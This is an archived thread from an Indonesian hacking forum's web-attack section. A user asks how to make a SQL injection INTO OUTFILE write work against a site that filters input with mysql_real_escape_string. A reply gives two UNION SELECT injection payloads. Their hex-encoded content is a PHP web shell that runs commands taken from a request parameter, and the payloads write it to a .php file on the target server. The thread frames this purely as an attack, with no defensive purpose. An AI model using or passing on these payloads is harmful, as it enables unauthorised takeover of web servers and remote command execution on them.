+- Indonesian Back|Track Team (https://www.indonesianbacktrack.or.id/forum)
+-- Forum: Attacker Zone (https://www.indonesianbacktrack.or.id/forum/forum-169.html)
+--- Forum: Web Attack (https://www.indonesianbacktrack.or.id/forum/forum-181.html)
+--- Thread: Ask SQL Injection INTO OUTFILE bypass mysql_real_escape_string (/thread-6435.html)
SQL Injection INTO OUTFILE bypass mysql_real_escape_string - dharaninja - 08-15-2015
![[Image: Screenshot_from_2015_08_15_11_31_52.jpg]](http://s23.postimg.org/4sldlegei/Screenshot_from_2015_08_15_11_31_52.jpg)
Ane mau tanya nih bypass mysql_real_escape_string untuk outfile
Pertama ane check user dulu sama file_privelege. Hasilnya root dan memiliki akses write file
![[Image: Screenshot_from_2015_08_15_11_38_34.png]](http://s23.postimg.org/585u5wh3f/Screenshot_from_2015_08_15_11_38_34.png)
Nah, pas ane coba upload malah kayak gini. Pathnya ane hex karena kan karakter ' di filter
![[Image: Screenshot_from_2015_08_15_11_45_13.png]](http://s15.postimg.org/c5ojh2ffv/Screenshot_from_2015_08_15_11_45_13.png)
Mohon pencerahannya brother, ane masih belajar.
RE: SQL Injection INTO OUTFILE bypass mysql_real_escape_string - Guest - 09-13-2015
try dis ;
..?id=-1 UniOn SeleCt 0x223c3f2073797374656d28245f524551554553545b27636d64275d293b203f3e22 into outfile '/ur/path/here/lol.php'--+-
or ;
..?id=-1 UniOn SeleCt 0x223c3f2073797374656d28245f524551554553545b27636d64275d293b203f3e22 into outfile '/ur/path/on/hex/here/lol.php'--+
RE: SQL Injection INTO OUTFILE bypass mysql_real_escape_string - dharaninja - 09-22-2015
(09-13-2015, 01:06 AM)Guest Wrote: try dis ;
..?id=-1 UniOn SeleCt 0x223c3f2073797374656d28245f524551554553545b27636d64275d293b203f3e22 into outfile '/ur/path/here/lol.php'--+-
or ;
..?id=-1 UniOn SeleCt 0x223c3f2073797374656d28245f524551554553545b27636d64275d293b203f3e22 into outfile '/ur/path/on/hex/here/lol.php'--+
But, mysql_real_escape_string will addslash every single quotes. Example : INTO OUTFILE '/path' will become INTO OUTFILE \'/path\' . So, it wont work